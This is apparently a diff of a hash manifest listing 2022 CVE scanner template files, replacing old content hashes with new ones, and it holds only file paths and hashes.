+http/cves/2022/CVE-2022-28117.yaml:fd1a36a34116d91ca9b14c4ac8921b433379ad97 +http/cves/2022/CVE-2022-28219.yaml:8202b2c8306ae87dcd1e06acb54ad77150eaa55b http/cves/2022/CVE-2022-28290.yaml:8440960ace63416405bd7a7b189f116f279c0484 -http/cves/2022/CVE-2022-28363.yaml:176ec97de549934101003218e30ef7c1965fabb5 -http/cves/2022/CVE-2022-28365.yaml:a7be18b9d9eadb1f32ee16d1eda51326d57c8dcf -http/cves/2022/CVE-2022-2863.yaml:6519e8ee1bfe84f7b48457e70d0827f8faa2deb1 +http/cves/2022/CVE-2022-28363.yaml:cc9685220579da5c2a9a8867995ba074cb4233a1 +http/cves/2022/CVE-2022-28365.yaml:4e72efa464c36f725336a7c324c1a64dbff39583 +http/cves/2022/CVE-2022-2863.yaml:b7c3f6a3dfefea2e16da9f2316ff124718d8a7cd http/cves/2022/CVE-2022-28923.yaml:6f9bba6c52e322bef8684d5b700503bc747d8ca1 -http/cves/2022/CVE-2022-28955.yaml:24fdde3fe7600a3edf2f1d0514d1d02ade08a120 -http/cves/2022/CVE-2022-29004.yaml:85994f0b5fd65052ed7b495842c0f1caef4ee9b8 -http/cves/2022/CVE-2022-29005.yaml:1b156fe48619c683da14f3860f9d2d219cbbe16c -http/cves/2022/CVE-2022-29006.yaml:6f304ff6ad0407fec57ea4e465074d81362f2181 -http/cves/2022/CVE-2022-29007.yaml:b0199a1db8400bad64bdf153b080cbccde03f28a -http/cves/2022/CVE-2022-29009.yaml:efe6d28d491e2b932ccb0df05fc95432d8d88e0c -http/cves/2022/CVE-2022-29013.yaml:3d1133ea648d232dd34083cd1bb6ed6ff3ec71ed -http/cves/2022/CVE-2022-29014.yaml:d96e56be3669578da2a55c0b65426bb43c0408ce -http/cves/2022/CVE-2022-29078.yaml:aed8a35514a9881351a71b303b597db1157c9da4 -http/cves/2022/CVE-2022-29153.yaml:af7ccb0e452778157c8ff5ca7cc0cef5ed602965 -http/cves/2022/CVE-2022-29272.yaml:078c6dffefb626b3cd01251691f97b8f0e9a9ed4 -http/cves/2022/CVE-2022-29298.yaml:0bcda50f50dcbfb62b8cf5fa448b50ad14a0cf18 +http/cves/2022/CVE-2022-28955.yaml:1d47804e894ccd8a9761ee84225ed765758bd3ac +http/cves/2022/CVE-2022-29004.yaml:2d70f0deb661fcd8378f0defe94b5b8ff3d1b2bc +http/cves/2022/CVE-2022-29005.yaml:ba2650306136be7e839e60a17017bdef19778395 +http/cves/2022/CVE-2022-29006.yaml:3f92cc94c558aeca1f7663a6ca6326cbb3fd916a +http/cves/2022/CVE-2022-29007.yaml:ce0ebbc203785c132346d45bbc9fb9cba385a695 +http/cves/2022/CVE-2022-29009.yaml:a8125fe7fab4768c0ff0141df382a51be6ab5b7b +http/cves/2022/CVE-2022-29013.yaml:f870df8d5e98a8c2010736c7360b9d4bd34926df +http/cves/2022/CVE-2022-29014.yaml:eb89b3104590a4160926c3bf3aa6d56bfc8ecdb6 +http/cves/2022/CVE-2022-29078.yaml:78da9911e25b0d3be3ed629ecf6048f20b9eeb6a +http/cves/2022/CVE-2022-29153.yaml:d6aaaa8ba76fae69b21ffc3b5ffdb2099a71e7e4 +http/cves/2022/CVE-2022-29272.yaml:e46629c0d32306c928c18e548ae6873dcc8bda84 +http/cves/2022/CVE-2022-29298.yaml:c3c3ae5a5c5ce9e831076128b0a459bca3734e6d http/cves/2022/CVE-2022-29299.yaml:4ca43f289ba13eddc097bd4e67738ff9b859e918 http/cves/2022/CVE-2022-29301.yaml:00fdd854b16529833bddf7e7a6d5271787eb2868 -http/cves/2022/CVE-2022-29303.yaml:fc79cfe29b9de1b91277f16f39e7668941e4219f -http/cves/2022/CVE-2022-29349.yaml:f2389538f96572d2749c64467ce794b368a6a3ce +http/cves/2022/CVE-2022-29303.yaml:e412d5c1d4d856a6614d721c0b020e98ae67a1ba +http/cves/2022/CVE-2022-29349.yaml:ca126ee4edf1a4ab39deb754320e725d31ccd872 http/cves/2022/CVE-2022-29383.yaml:1f1a67523a657132055661ca16b0d5671ea8681c http/cves/2022/CVE-2022-29455.yaml:929c2512832cab6541789b6b561df0d8477498f8 -http/cves/2022/CVE-2022-29464.yaml:9cee9272826d8383176c9248ca2e33d28c00b004 -http/cves/2022/CVE-2022-29548.yaml:5a28174d75f79d617a609e6d3c7ca146d8dc6eee -http/cves/2022/CVE-2022-29775.yaml:668fa56797cd4b0d3b37853566f7ebfcf3b1faf6 -http/cves/2022/CVE-2022-30073.yaml:4805a53eb3eb994da1a7bc4a391e140930725721 -http/cves/2022/CVE-2022-30489.yaml:672364683b7586f2bd13a7f559c7f21a8c93b21d -http/cves/2022/CVE-2022-30512.yaml:7271de7e36b085c19050c96fa674a5b2db74714e -http/cves/2022/CVE-2022-30513.yaml:bb501e91555ca73c5f2a7cdf8408a51e34516e4f +http/cves/2022/CVE-2022-29464.yaml:bf87e27647d1ebbf877cfd7143b65cd660fb137c +http/cves/2022/CVE-2022-29548.yaml:cbc6fc977f78500ad9b187fd7b2380ec71249853 +http/cves/2022/CVE-2022-29775.yaml:60ab880ce620e2434f39655520846122ac0bfc1e +http/cves/2022/CVE-2022-30073.yaml:883ed694eb477c29321c25a784a8b8bd0e4c7bd9 +http/cves/2022/CVE-2022-30489.yaml:48cac2049ddc762c7305b763ca51b0c41caa1df1 +http/cves/2022/CVE-2022-30512.yaml:481ad8dc366af6b04bd8a7ee28b2fcd3cabb8236 +http/cves/2022/CVE-2022-30513.yaml:12ec0a38286f02f3cb0f6987b434b77f65c230b4 http/cves/2022/CVE-2022-30514.yaml:a7a01641fab1a8401851ea7d602d12f2893d4adb -http/cves/2022/CVE-2022-30525.yaml:4ea2664f6f3895e0d3987c94a199796591b06f79 -http/cves/2022/CVE-2022-3062.yaml:7545985982064ed6299bb255ed864c05288ef8d7 -http/cves/2022/CVE-2022-30776.yaml:cdd27a6361eaf5ae1bc2e10f88ffea3c010964dc -http/cves/2022/CVE-2022-30777.yaml:4a5d5c47347d47105250e150bce32834e3425b07 -http/cves/2022/CVE-2022-31126.yaml:89fc64d333b207f18e9d8828ad1bec7e774240a0 -http/cves/2022/CVE-2022-31268.yaml:0ddb08b717fc7c4e161197e5c95aadaf9e5f23c2 -http/cves/2022/CVE-2022-31269.yaml:aa0e473a167e10324b95b3574578e1cf7b57fe5b +http/cves/2022/CVE-2022-30525.yaml:4d90b29ba8aae34ecb895dde2c2ca49a61f459ac +http/cves/2022/CVE-2022-3062.yaml:800bb8903716586e3844dc3be9a59571bd9ff402 +http/cves/2022/CVE-2022-30776.yaml:b76e1c92439e4548bff7f721e74c7a5fc4366213 +http/cves/2022/CVE-2022-30777.yaml:b6209175e96f33fe9c6aa9fbdf1b7b9a81158a39 +http/cves/2022/CVE-2022-31126.yaml:82fb9dced01e613af573ba72cfb75c7c883d225c +http/cves/2022/CVE-2022-31268.yaml:928ccaa669be7c767bc5d9e4cecc405b762c9d33 +http/cves/2022/CVE-2022-31269.yaml:17a274515295763d5047717c64a574d4de127383 http/cves/2022/CVE-2022-31299.yaml:83e0fce7d1de1b228595ffa36be5d64ee8aef870 -http/cves/2022/CVE-2022-31373.yaml:e0f1aa60f4d127a0f6a8e5143cbf05b7a843424b -http/cves/2022/CVE-2022-3142.yaml:7b68891c30f3c9c8bcf079a452f2c734dde541e4 +http/cves/2022/CVE-2022-31373.yaml:b1dd8fa5fc5a7cc6a07835579c77f189cb688821 +http/cves/2022/CVE-2022-3142.yaml:0ab319adad78001466f99b3ea8a3b75e4149690a http/cves/2022/CVE-2022-31474.yaml:ea47cd03d542d4c58da04a90b5803dfd9f2997e2 -http/cves/2022/CVE-2022-31499.yaml:3813062ffa12af1b479057c96cb534c7997175d2 -http/cves/2022/CVE-2022-31656.yaml:1d999151f252cc5e3c627bf7cd77ff6dd5dccd47 -http/cves/2022/CVE-2022-31798.yaml:1796fd5e2b0063cafc5ae869b8f2a1bc6b71991d -http/cves/2022/CVE-2022-31814.yaml:8accdf77652c1c95ff6907d738c3aa41def005ab -http/cves/2022/CVE-2022-31845.yaml:7bd79819c1e84dcc06ff9ec05ada1b03ec6d4dd8 -http/cves/2022/CVE-2022-31846.yaml:fc7f37bea03e5cf47929de63afc85fcf34d118d8 -http/cves/2022/CVE-2022-31847.yaml:b9e1b7c00adf1ade56c7b728b90c0fe0e6f7b8f1 -http/cves/2022/CVE-2022-31854.yaml:ebfcc6eef79ec6427571fcb9d4a09b31cc892e3d -http/cves/2022/CVE-2022-31879.yaml:9151c35fc3ea67d7d33d34f434ad39039edb0c98 +http/cves/2022/CVE-2022-31499.yaml:a4b7c73f255b3b79c794032321267bb88ae7b8d3 +http/cves/2022/CVE-2022-31656.yaml:6092c3e1effe45859ebe139b808edeaf5f7c120d +http/cves/2022/CVE-2022-31798.yaml:d8ec34db1e298169e27be0989bad5b333cf7e90f +http/cves/2022/CVE-2022-31814.yaml:994f7827151acd9db7ba7b1f814f644dc9248b6a +http/cves/2022/CVE-2022-31845.yaml:f50420c8f1f3eaf701131aeb526f37483126a1da +http/cves/2022/CVE-2022-31846.yaml:8df31bc5751cf2f3f9c4a39926e6e87c0a38bb55 +http/cves/2022/CVE-2022-31847.yaml:80e49fd56d810e107410e0f04348ab99aa413f17 +http/cves/2022/CVE-2022-31854.yaml:0d92e3c266fba0ccc538150c6c8c6b0c5eecb3df +http/cves/2022/CVE-2022-31879.yaml:ecf1c40795f31704bde59f6465e18f9359a01f15 http/cves/2022/CVE-2022-31974.yaml:6711ff86f730445184c93c2a91a32daf2af56723 http/cves/2022/CVE-2022-31975.yaml:1d80466a8bfedc02bacb9b870793a036d0769a40 -http/cves/2022/CVE-2022-31976.yaml:152837b055f87088c4e18725c6de34f54769b849 -http/cves/2022/CVE-2022-31977.yaml:ca14acfeeb3fcbf6085292b53628457d87213940 +http/cves/2022/CVE-2022-31976.yaml:af47305c69b62a3707544b8824d73730f1feea28 +http/cves/2022/CVE-2022-31977.yaml:fb933c37a9088114120622f44fbde494ad76b685 http/cves/2022/CVE-2022-31978.yaml:d082ccb6e5136465a070be3119ace6a2d590bf98 http/cves/2022/CVE-2022-31980.yaml:a4baa163ee8e01c4dca72b3481a50bed0a800a2e -http/cves/2022/CVE-2022-31981.yaml:774e56f620ea8d1b55b8e1e2e81a391875a88831 +http/cves/2022/CVE-2022-31981.yaml:53292d344e663430fd29d41862a751fcf84dc93e http/cves/2022/CVE-2022-31982.yaml:14887472d5e8ef45ff5a9e2985f9ce447fc482d2 -http/cves/2022/CVE-2022-31983.yaml:fc2477a4ad9b8e096c82e7b71e606069f5eb7f1c -http/cves/2022/CVE-2022-31984.yaml:9fa220d8fdd8c39a91a46eaaf91d597377f86be3 +http/cves/2022/CVE-2022-31983.yaml:bd550f93be35f780d96d33f4366e0dbd971fa5e0 +http/cves/2022/CVE-2022-31984.yaml:164dd112395242226934dd94a642fcb5fea821d9 http/cves/2022/CVE-2022-32007.yaml:e906645b18647cd54049b516c600dcb45757027f -http/cves/2022/CVE-2022-32015.yaml:7ba3f071d0c833899fd3e61325be34d81ab2b9ef -http/cves/2022/CVE-2022-32018.yaml:427a0d5b9a35700e1b2f9ff88ee38bd6ba9fb1b7 -http/cves/2022/CVE-2022-32022.yaml:1031e1430bbbc68d3ca4de21083e904ab6cc105e -http/cves/2022/CVE-2022-32024.yaml:3869474db5e01d86e6f6a7d0524765ce76dbacdd -http/cves/2022/CVE-2022-32025.yaml:8178d396854929a07dd4c9d026514b1ccf5fb255 -http/cves/2022/CVE-2022-32026.yaml:08805280c66966c56dd18adca4fefeb4c218041d -http/cves/2022/CVE-2022-32028.yaml:f4d6bbdda0a184ae7218bb3896d3d1e92730f740 -http/cves/2022/CVE-2022-32094.yaml:a5d186dca8e5ec2e6b7574fcd5f5c73d57683894 -http/cves/2022/CVE-2022-32195.yaml:5cfa0d5a1ba2723fd6058e655717f25f38f28491 -http/cves/2022/CVE-2022-32409.yaml:8820bb22ab4fe190833abf743af73cdcaeb27f66 -http/cves/2022/CVE-2022-3242.yaml:48197c30904b86d61554d74300dfaf2c24689dc8 -http/cves/2022/CVE-2022-32429.yaml:6ffcd9e6e752e626a25ef2d90f0efae98c855cab -http/cves/2022/CVE-2022-32430.yaml:778814e80b2f21d1ebcf1167c53e687ab74bd56b -http/cves/2022/CVE-2022-32444.yaml:00a8ad41c55688ed77152aded0d7c136b0143876 -http/cves/2022/CVE-2022-32770.yaml:a1c1fabf20337e18ac818562315acbe288274af1 -http/cves/2022/CVE-2022-32771.yaml:03f39391c095a08e62741ce113c743f4517b8823 -http/cves/2022/CVE-2022-32772.yaml:da27806050d52e5cac3989730b256c6f4509314c -http/cves/2022/CVE-2022-33119.yaml:ff5573e49a471b38a8309236950429441246dfab -http/cves/2022/CVE-2022-33174.yaml:fdf252755679cf8edbb5d3bd76a2e3318c38b703 -http/cves/2022/CVE-2022-33891.yaml:be15239c35fe6650ca82d85b304b20132ea20b4e -http/cves/2022/CVE-2022-33901.yaml:ad281903ad2b3a9d2612e85fd9668f248e915a8b -http/cves/2022/CVE-2022-33965.yaml:3739b3179daf3df8780e204c3eb4c3b981cf15d6 -http/cves/2022/CVE-2022-34045.yaml:3db1aeeb2d125c974bf12bbcfa88b3011d00093d -http/cves/2022/CVE-2022-34046.yaml:24922f5dc6265bf9f13a135fb048b14d01ab9d0b -http/cves/2022/CVE-2022-34047.yaml:34b0f08c6761bb97ac3fbede555d0e08a6c4f62c -http/cves/2022/CVE-2022-34048.yaml:1610adaa9b578e5044208cd40153bdec14cc57b9 -http/cves/2022/CVE-2022-34049.yaml:fb575e9805d599514c4f3b024c7413ccf0ff1dea -http/cves/2022/CVE-2022-34093.yaml:d833077c3ed2bacc7f3727cc8b423acfc2a3ac5a -http/cves/2022/CVE-2022-34094.yaml:dab272e28788fe06a9fba7dcfb3794e42b03f59f -http/cves/2022/CVE-2022-34121.yaml:80284aa2ee2e18c06f64a2744b0215855866624c -http/cves/2022/CVE-2022-34328.yaml:6c4ef061ec996841be3e4b953085fd717719a55c +http/cves/2022/CVE-2022-32015.yaml:ec2c1708fead606aa390b8c35c46a34ddc777eb5 +http/cves/2022/CVE-2022-32018.yaml:551975f5da6db94b170725d3686f39c4bc435fde +http/cves/2022/CVE-2022-32022.yaml:9586471a0368ac819bd583931c949b09d48d24a8 +http/cves/2022/CVE-2022-32024.yaml:207ce401aa5f7dc8ed56a60db62c6394e8619d25 +http/cves/2022/CVE-2022-32025.yaml:d1081e873521f01221f98a0390cd1941f35ad5f4 +http/cves/2022/CVE-2022-32026.yaml:fd956f8e58bd3c74a0b638582e3379a0164b645b +http/cves/2022/CVE-2022-32028.yaml:ba2257a785f2c984a7435a10b66e0faa6e9ee7cb +http/cves/2022/CVE-2022-32094.yaml:ba8d397ce2a250f61448842736a9ae8df1245f4b +http/cves/2022/CVE-2022-32195.yaml:b385b13ea98fcfd02610cc4190a83c890976589d +http/cves/2022/CVE-2022-32409.yaml:cdaa40ef5296aa273cff3e52b2223e915ccc91c9 +http/cves/2022/CVE-2022-3242.yaml:55e5d08f68dbc419510b54333506ca5ed690ab6f +http/cves/2022/CVE-2022-32429.yaml:d1e64c39847e71ace80f87533f8efe0135418653 +http/cves/2022/CVE-2022-32430.yaml:19d2b8e3425cd8ecd0fe3ea4ac8fd65bd1994b8f +http/cves/2022/CVE-2022-32444.yaml:d3547e337eca62e0ee2d06483b6afcfad9bb57c1 +http/cves/2022/CVE-2022-32770.yaml:35826cc7fe5e9f172929bc10724a945a4538a8cd +http/cves/2022/CVE-2022-32771.yaml:7ce55fda19ca98acb61f2ad07fedc9ff156bb348 +http/cves/2022/CVE-2022-32772.yaml:3de244b98d52162e49284deea5f30b2420d67424 +http/cves/2022/CVE-2022-33119.yaml:16e23a190bad201697dd8aa0410174defb4eff60 +http/cves/2022/CVE-2022-33174.yaml:9a29967c97f24a1af05aa9868e1daf084c0c5ba5 +http/cves/2022/CVE-2022-33891.yaml:05e8f177e1c72009cd49d11afa11e61261035c79 +http/cves/2022/CVE-2022-33901.yaml:bbd8ecc8d9150023534d5092980f2c18173e5f27 +http/cves/2022/CVE-2022-33965.yaml:92e795d1852ccb1de9b4f5c935e97132b0156229 +http/cves/2022/CVE-2022-34045.yaml:04b032425379bdc77d5deedce61cb32b4edc721f +http/cves/2022/CVE-2022-34046.yaml:5afcfdfca99bf861c7f28898d146887be8c9959d +http/cves/2022/CVE-2022-34047.yaml:2729826a4e3aa2adcbc4483c40848e0b8d2aaafd +http/cves/2022/CVE-2022-34048.yaml:d9558fb81dcbc712ed12a59d6673e1d97a5f86b6 +http/cves/2022/CVE-2022-34049.yaml:414cc417dbea463e70b94ea52e8c8fe8f1ae9fcc +http/cves/2022/CVE-2022-34093.yaml:db9dfda36eebbd289437eb9334f6c2a943d35fb6 +http/cves/2022/CVE-2022-34094.yaml:970e54a6a41e8d46c4887549f9e16230b4619157 +http/cves/2022/CVE-2022-34121.yaml:2787d6c8b42395e83efd3f3c217617364a211403 +http/cves/2022/CVE-2022-34328.yaml:acb0ddabe1710a8a603747da1992d51fc8d00343 http/cves/2022/CVE-2022-34534.yaml:9ffb8d48988fbf1da5a24e59db586356c05d2c9b -http/cves/2022/CVE-2022-34576.yaml:b3007f2a02f22b1b712f6c3dce81e78d002de661 -http/cves/2022/CVE-2022-34590.yaml:976120387598d43ed2f73139b0b4b0e641cdeff3 -http/cves/2022/CVE-2022-34753.yaml:27251e7b69ecc21f41223cab8a946027d57de4f3 +http/cves/2022/CVE-2022-34576.yaml:1798a725c81fdcdc7857b1dfa8bb3e50af7967aa +http/cves/2022/CVE-2022-34590.yaml:dda3291a4b9c79114c37ff3f316f752e34591f27 +http/cves/2022/CVE-2022-34753.yaml:afee835f00cc1df39ed9964d00d627c4d1b0f58b http/cves/2022/CVE-2022-3484.yaml:9b14f907cb7136b5784b38fcad2ea5ad3616ad6b http/cves/2022/CVE-2022-3506.yaml:c968d447575bfbedfda9e2f946c6dc742a462ee6 -http/cves/2022/CVE-2022-35151.yaml:78b045b164a32638c0d96667d7363e860429636e -http/cves/2022/CVE-2022-35405.yaml:400b6bdce6fc675115d9f10ea661f563e192ccff -http/cves/2022/CVE-2022-35413.yaml:a04d520dda16a5a3b557741b9799f64dca5b607a -http/cves/2022/CVE-2022-35416.yaml:846b76f1244a74b731a2de94f619247d82a3d057 -http/cves/2022/CVE-2022-35493.yaml:696f6550ed20e836ec173dc6b408d1d8197de633 -http/cves/2022/CVE-2022-35653.yaml:455b567165bb2df93578ea3065d88b220176b09f -http/cves/2022/CVE-2022-3578.yaml:85f310edb30761e80b3acd9663874973c3102070 -http/cves/2022/CVE-2022-35914.yaml:62998ca7adf20ff73ab47986aef791c59c937b15 -http/cves/2022/CVE-2022-36446.yaml:794439c6f3e3f6d7ddbf33df5f3a8296ef069fcd -http/cves/2022/CVE-2022-36537.yaml:04fb796a97114be0c6fd20ec6748123f9d032e56 -http/cves/2022/CVE-2022-36553.yaml:118e10a4f0e9a125354f3f16a748ffcb24166df9 -http/cves/2022/CVE-2022-36642.yaml:ad370876ce80a3e487e7c656409ba4d81e1d9062 -http/cves/2022/CVE-2022-36804.yaml:36873d77fa2b5719ba3321412912af6f5c21cc37 +http/cves/2022/CVE-2022-35151.yaml:ebd86d38e9053470f7556e9153e6d4ac3c490123 +http/cves/2022/CVE-2022-35405.yaml:d2f8ef14ef62861d225e570ab5bb459ef15d7d6c +http/cves/2022/CVE-2022-35413.yaml:5f5b49f4f34a01110902e54518444fc96a1deb09 +http/cves/2022/CVE-2022-35416.yaml:31d6d56c3d52ebd3fbd47a749fd7631a493948f6 +http/cves/2022/CVE-2022-35493.yaml:975b5ddf394023dd578a236a3ec085090fd2fb27 +http/cves/2022/CVE-2022-35653.yaml:65a1a5db8ef3b85e3ba1a29c18e2e2a4cf2ac30a +http/cves/2022/CVE-2022-3578.yaml:196b7f4717e5f7c7d8ea990d8e77b06e8c32fbbf +http/cves/2022/CVE-2022-35914.yaml:e697c17b89eb47f678cb132049aafeee165dcf40 +http/cves/2022/CVE-2022-36446.yaml:b128acedc5aeab4bf73646340183b230b8cb050e +http/cves/2022/CVE-2022-36537.yaml:7c3fd9dc6e86f9de1f597060f394354e974cfaf5 +http/cves/2022/CVE-2022-36553.yaml:14aaf8d87043c2140a8b8b40714c95647f28fc61 +http/cves/2022/CVE-2022-36642.yaml:8876b041f019a89ae3bca2c7d2844ea11516e94a +http/cves/2022/CVE-2022-36804.yaml:48768b4ff9ab543c51a1e21bf4cba75e81f2177a http/cves/2022/CVE-2022-36883.yaml:b2a77fd8caa9f90f4c624d08e79da36785fb5887 http/cves/2022/CVE-2022-37042.yaml:791bb09d5a41f5aa2c4efe95fff894066aca3462 -http/cves/2022/CVE-2022-37153.yaml:bff5ca48a13c33419a1fa91ddf41822f715d629b -http/cves/2022/CVE-2022-37190.yaml:656d2426bfe18c9ae5fd957a5d4aeb44da7b7267 +http/cves/2022/CVE-2022-37153.yaml:dceb39b03d7b48df7d64eb4c49bb63bd364cdb86 +http/cves/2022/CVE-2022-37190.yaml:e9b680bb1d4fb90aba7c9beb4daaa03fa5acc67c http/cves/2022/CVE-2022-37191.yaml:a977ea067bf64e1d421824777088a50fd310eb2e -http/cves/2022/CVE-2022-37299.yaml:3889bf8832d2f58c4cbd14f74b5de71a0336cb71 -http/cves/2022/CVE-2022-3768.yaml:ced3fb8dc8aed180f6f71e7220f6737492ff7aee +http/cves/2022/CVE-2022-37299.yaml:2bf98141108464e39939076964bc3f0b76a1d419 +http/cves/2022/CVE-2022-3768.yaml:ffd277014afbe590ee92b911ea18617d95a54b4a http/cves/2022/CVE-2022-3800.yaml:e0db40aab2e6f85e641c8544d490df6d1813bfb4 -http/cves/2022/CVE-2022-38131.yaml:ed9abd19c96c5190767b69c8316450618260fc8f +http/cves/2022/CVE-2022-38131.yaml:16633791ba453690abbccc04bf2827d3e3b64fa8 http/cves/2022/CVE-2022-38295.yaml:5d2b719b844945457583a57848120fce85b5ddee http/cves/2022/CVE-2022-38296.yaml:ddedd4e313db9c5b34f247104057fd75cf21c627 -http/cves/2022/CVE-2022-38463.yaml:dca3c9b8141339cd54c77ba98176a7dae1a43f61 +http/cves/2022/CVE-2022-38463.yaml:8a460761963d6452e325a6967929f735d9624c9b http/cves/2022/CVE-2022-38467.yaml:62f2d8f8084e77210d887d32f244205e1a886cb9 -http/cves/2022/CVE-2022-38553.yaml:de400d255c6fa49ce0c44073b9f7092f60c170d6 -http/cves/2022/CVE-2022-38637.yaml:3819737eac0ad97044f7b293d0229eac575d0a15 -http/cves/2022/CVE-2022-38794.yaml:a08081d8d87e2a74ea98a92576ceff1b2b3ccb10 -http/cves/2022/CVE-2022-38817.yaml:1b637b10a98cb4d31101583a4a3b34c7e6664852 -http/cves/2022/CVE-2022-38870.yaml:61f15dfa1321ff68d9c2224e6ba4b0090fa4f6a4 -http/cves/2022/CVE-2022-39048.yaml:7bba50d505e2cbf5288a51fc7f8dd6a31f5086ad +http/cves/2022/CVE-2022-38553.yaml:99a61eaf9f0eef9526a19cfb3f9d81234b5a61ab +http/cves/2022/CVE-2022-38637.yaml:5229df6801603fbe9860fb4d08fb4702154a46ba +http/cves/2022/CVE-2022-38794.yaml:05d398a39b276d94ec05f9e2d2273726737e4835 +http/cves/2022/CVE-2022-38817.yaml:b8c33e77974977638c28a124b46baffb59e11f50 +http/cves/2022/CVE-2022-38870.yaml:0d586a3f9611fa4f761056be78defb8e43041a81 +http/cves/2022/CVE-2022-39048.yaml:484860f8b3c1457bcbec897dbf3e0480611c631a http/cves/2022/CVE-2022-3908.yaml:7a24ebd5708610556552ab3053544addd76e9dc2 -http/cves/2022/CVE-2022-39195.yaml:9722f574507425682ebbfa2ea2e59ced9dd02234 +http/cves/2022/CVE-2022-39195.yaml:5a6117d247d94ac07d2a01f761b7560e5beb434f http/cves/2022/CVE-2022-3933.yaml:8bdf9fc2cc672a6ceeadc95a0bb890ab17396398 http/cves/2022/CVE-2022-3934.yaml:e1abcd7b986d2f3622f65200fdc1412374c8f640 -http/cves/2022/CVE-2022-3980.yaml:c62703eafccdacebfa34726173c9016f2ebb689f -http/cves/2022/CVE-2022-3982.yaml:2d24d96db546b8f6a767a34887bb9bdc2b121c8c -http/cves/2022/CVE-2022-39952.yaml:5faef9501aa8d2570eb32f70d443978e08c4b420 -http/cves/2022/CVE-2022-39960.yaml:149945d07d1a3885428826ef82731d610c0396eb -http/cves/2022/CVE-2022-39986.yaml:8d52d2c613445e9f49cb6aacecf0f7a868a22b54 -http/cves/2022/CVE-2022-40022.yaml:53f3fe7c38deb2b26cf0ae76a236bebb37be87c0 -http/cves/2022/CVE-2022-40032.yaml:418a95c62304da388506bf530c3d2ca52f947a76 -http/cves/2022/CVE-2022-40047.yaml:31510286288fab08732fb59ceec43e7462805345 -http/cves/2022/CVE-2022-40083.yaml:ce4772335466d5050c22ab6e7742bde8293ae1ab -http/cves/2022/CVE-2022-40127.yaml:0dd1af5185e737b922f74df28fef9a2aeade0436 +http/cves/2022/CVE-2022-3980.yaml:be0932c302151a00f4a4e3aafc044131fa7041c9 +http/cves/2022/CVE-2022-3982.yaml:f1ae90ddebbe87cc6d2afa54dbbddce7a64d8a0f +http/cves/2022/CVE-2022-39952.yaml:5cad670355bc18db9021105888d1a4aaa41931d8 +http/cves/2022/CVE-2022-39960.yaml:8cb9de579b88d371eab64496c9d02d4100927ca5 +http/cves/2022/CVE-2022-39986.yaml:2ef3546836c760afbf47f417d561bdb2ef43774e +http/cves/2022/CVE-2022-40022.yaml:12859046bf14e5f3f21d178ce9015ad7a7ba31de +http/cves/2022/CVE-2022-40032.yaml:1396354a1b4e319824165d92bbdc696ae6d492d6 +http/cves/2022/CVE-2022-40047.yaml:1051ce40d38c12dcb11a88856d6aa09c2233438a +http/cves/2022/CVE-2022-40083.yaml:dab7a5d89ce9e24219132f7ea31024babc1adb7d +http/cves/2022/CVE-2022-40127.yaml:09dfedcc92379c248beda2e26c2cad770d0f3ca5 http/cves/2022/CVE-2022-40359.yaml:ddd501f8d916d909938c17ccf6492dc2e2c7d812 -http/cves/2022/CVE-2022-4049.yaml:74e3e5dbc2d51c3e0ab49ad1a5829a0ad4a9de1d -http/cves/2022/CVE-2022-4050.yaml:e61dd55b0ec7ebb39133df4c86f2ed7a68ac3e59 -http/cves/2022/CVE-2022-4057.yaml:62c500fc2eb94c4c98341f080f4375303b791b72 -http/cves/2022/CVE-2022-4059.yaml:e3d1d2811d48942e8fcd3a53f99d2a0bcced68e2 +http/cves/2022/CVE-2022-4049.yaml:e6d552a5ceef081c8c1df71be4326ffd9c53b522 +http/cves/2022/CVE-2022-4050.yaml:fa6d88bc616e361834ebeb5c478ca05c83185ba0 +http/cves/2022/CVE-2022-4057.yaml:14f32b6b618af722f36d34536ba0f5d0272b936b +http/cves/2022/CVE-2022-4059.yaml:1fe820b76e6c8bc9ec2332d71a49eec82867be11 http/cves/2022/CVE-2022-4060.yaml:4564f0fd4f8ed6221de40ce6673f81c2c9453e8c -http/cves/2022/CVE-2022-4063.yaml:595c0a52ff25516a83f3f31e08330530040d209c +http/cves/2022/CVE-2022-4063.yaml:3fb1ed5b51203915d8cfd84cb8db575e4d87e941 http/cves/2022/CVE-2022-40684.yaml:9f201c8f2b14b43cff542ef33691c0622eabc992 -http/cves/2022/CVE-2022-40734.yaml:a4a4ad57c79dd414a6d2fc562175fca67422d4a8 -http/cves/2022/CVE-2022-40843.yaml:28ccac76ca295cfb4f3ae8eaaa85fa4e3b5cbb51 -http/cves/2022/CVE-2022-40879.yaml:083ff858bd6e8d292d5a999ba933698f5f2c6e3c -http/cves/2022/CVE-2022-40881.yaml:a8bf76f64d0d5af12a5bf4f286e83a8a27ffc529 -http/cves/2022/CVE-2022-4117.yaml:1e44f0c7ce464548cf7a8ff5c714866891b81a12 +http/cves/2022/CVE-2022-40734.yaml:8a7781bc2daca562ad8c0731b6c6a17f2668b3b5 +http/cves/2022/CVE-2022-40843.yaml:ece5d4a184a394a8443bb4be181314ea0141e329 +http/cves/2022/CVE-2022-40879.yaml:6fcf7a32c558a8391534e5050bcdf7b2c23e34b6 +http/cves/2022/CVE-2022-40881.yaml:9424976184bfd9d0812861793aa2a9b7240d70b6 +http/cves/2022/CVE-2022-4117.yaml:e6691d5c3e272536505ae73224490049c663c874 http/cves/2022/CVE-2022-4140.yaml:f243423772b8b2e9cfb6a9a3d8e4bbbbab68b2c9 -http/cves/2022/CVE-2022-41412.yaml:897d78be653f3c09f28e027006285ca2dfd67d8d -http/cves/2022/CVE-2022-41441.yaml:53548507ba14aae755885a74642e9df3ac4b35e7 -http/cves/2022/CVE-2022-41473.yaml:fa99025c3ea2cad17dc2ac9f491389950e581c55 +http/cves/2022/CVE-2022-41412.yaml:a53e92a3ffc57fe9970417210b4b8e18252a255e +http/cves/2022/CVE-2022-41441.yaml:f6111ca558ce92532a392249f63461c9e27cd506 +http/cves/2022/CVE-2022-41473.yaml:6140ac3153ddc44648f8541e6aa31ddfb0951334 http/cves/2022/CVE-2022-41840.yaml:a55753333818330dd5ac198655530d2755a3a239 -http/cves/2022/CVE-2022-42094.yaml:22cbf742c665310adc7ced1dd3f87664b96b4115 +http/cves/2022/CVE-2022-42094.yaml:0934908b29dfe93589f6fe9f64cd6ad286089066 http/cves/2022/CVE-2022-42095.yaml:2a39087a4ed951945354f872a56e60599e8c0441 -http/cves/2022/CVE-2022-42096.yaml:b6a3d5aafc76e787690df471b148e5d332560729 -http/cves/2022/CVE-2022-42233.yaml:f17f5e5b660612fb7020138bf76fa8c838d7255e +http/cves/2022/CVE-2022-42096.yaml:0f7110cc7a7fc1daa7c154d0a491f66ac6d138dc 